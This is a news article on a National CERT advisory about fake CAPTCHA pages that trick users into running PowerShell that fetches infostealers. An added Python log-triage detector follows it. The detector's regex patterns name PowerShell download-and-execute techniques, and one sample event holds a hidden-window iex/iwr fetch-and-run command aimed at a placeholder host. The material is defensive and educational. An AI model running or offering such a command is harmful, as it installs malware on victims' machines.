NCERT Alerts Users of Fake CAPTCHA Scams Hacking Windows via PowerShell

The National Computer Emergency Response Team (National CERT) has released a cybersecurity advisory warning of a new malware threat that uses fake CAPTCHA verification pages to mislead users.

Called “Fake CAPTCHA Pages Leveraging PowerShell for Malware Delivery,” this campaign utilizes social engineering to trick users into compromising their systems. It has already targeted regional users, especially those seeking free online content.

According to the advisory, attackers redirect users to malicious sites disguised as free media platforms, where they are prompted to complete a CAPTCHA verification. Once users interact with this fake CAPTCHA, a malicious script is copied to their clipboard, which they are manipulated into executing. PowerShell is then used to download additional malware onto the system, including information-stealing tools and network scanners, which facilitate further exploitation.

The attack unfolds when users engage with these fake CAPTCHA pages, which mimic legitimate verification processes. By clicking on the CAPTCHA, users inadvertently run harmful PowerShell scripts that install and execute malicious files from an attacker’s server. Key indicators of compromise (IOCs) include several malicious URLs and file hashes, which the advisory encourages organizations to monitor and block immediately.

The National CERT notes that this campaign enables attackers to install various types of malware, including infostealers and network scanners, allowing lateral movement within compromised networks. The malicious PowerShell commands can bypass traditional defenses, making it essential for organizations to enforce strong endpoint protection and detailed PowerShell logging.

Immediate preventive actions recommended by the National CERT include educating users on social engineering risks, particularly the dangers of copying and pasting unknown commands. Organizations are advised to monitor network traffic for suspicious activity and enable PowerShell logging to detect unauthorized actions.

The advisory also suggests implementing multi-factor authentication (MFA), limiting privileged access, and deploying endpoint detection and response (EDR) solutions to mitigate risks. Blocking all identified malicious domains and URLs is strongly urged to prevent further breaches.
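
To show what the recommended PowerShell logging can be used for, here is an added triage sketch (not part of the National CERT advisory) that scores logged command text for the pasted download-and-run pattern described above. The indicator groups, the threshold, the event field names and the sample events are all assumptions constructed for this example.

```python
import re

# Heuristic indicator groups (assumed for this example; tune before real use).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:in(?:dowstyle)?)?\s+hidden\b", re.I),
    "encoded_command": re.compile(r"\s-e(?:nc(?:odedcommand)?)?\s+\S", re.I),
    "web_download": re.compile(
        r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|"
        r"downloadfile|start-bitstransfer|net\.webclient)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:invoke-expression|iex)\b", re.I),
    # Fake CAPTCHA lures often leave verification-themed text in the pasted command.
    "captcha_lure_text": re.compile(r"captcha|not a robot", re.I),
}

def score(command: str) -> list[str]:
    """Return the names of the indicator groups found in one command string."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]

def flag_events(events, threshold=2):
    """Return (host, hits) for events that match at least `threshold` groups.

    A single hit (for example a lone Invoke-WebRequest) is common in admin
    scripts, so only combinations are reported.
    """
    flagged = []
    for ev in events:
        hits = score(ev.get("command", ""))
        if len(hits) >= threshold:
            flagged.append((ev.get("host", "unknown"), hits))
    return flagged

# Constructed sample records, shaped like command text exported from
# PowerShell script block logging or process-creation auditing.
SAMPLE_EVENTS = [
    {"host": "WS-01", "command":
        'powershell -w hidden -c "iex (iwr https://media.example.invalid/verify.txt)"'
        " # I am not a robot - reCAPTCHA ID 0000"},
    {"host": "WS-02", "command":
        "Invoke-WebRequest -Uri https://intranet.example.invalid/health -UseBasicParsing"},
    {"host": "WS-03", "command":
        r"Get-ChildItem C:\Logs | Where-Object Length -gt 1MB"},
]

if __name__ == "__main__":
    for host, hits in flag_events(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(hits)}")
```

Matches are leads for an analyst to review alongside the advisory's URL and hash IOCs, not verdicts on their own.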
